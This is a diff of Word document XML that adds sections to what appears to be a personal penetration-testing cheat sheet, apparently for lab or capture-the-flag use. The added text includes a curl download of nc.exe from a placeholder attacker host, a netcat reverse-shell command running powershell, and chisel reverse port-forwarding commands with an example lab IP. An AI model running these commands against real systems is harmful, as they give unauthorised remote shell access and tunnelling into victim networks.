+        </w:rPr>
+        <w:t xml:space="preserve">curl </w:t>
+      </w:r>
+      <w:hyperlink w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>http://&lt;&lt;attacker-ip&gt;&gt;/nc.exe</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -o nc.exe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Getting reverse shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nc.exe &lt;&lt;attacker-ip&gt;&gt; &lt;&lt;attacker-port&gt;&gt; -e powershell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Port Forwarding</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>chisel</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Setting up Server (Linux)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>./chisel_linux server --reverse --port 1234</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Setting up Client (Windows)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.\chisel.exe client &lt;&lt;attacker-ip&gt;&gt;:&lt;&lt;attacker-port&gt;&gt; R:&lt;&lt;port&gt;&gt;:localhost:&lt;&lt;port&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e.g.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.\chisel.ex</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e client 10.10.14.72:1234 R:3306:localhost:3306</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
@@ -2253,6 +2795,119 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="69B3376A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="529A4434"/>
+    <w:lvl w:ilvl="0" w:tplc="0C090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C090005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="2"/>
   </w:num>
@@ -2261,6 +2916,9 @@
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -2732,6 +3390,28 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading4">
+    <w:name w:val="heading 4"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading4Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00D534CF"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40" w:after="0"/>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -2833,6 +3513,19 @@
     <w:rPr>
       <w:color w:val="605E5C"/>
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
+    <w:name w:val="Heading 4 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading4"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00D534CF"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
 </w:styles>
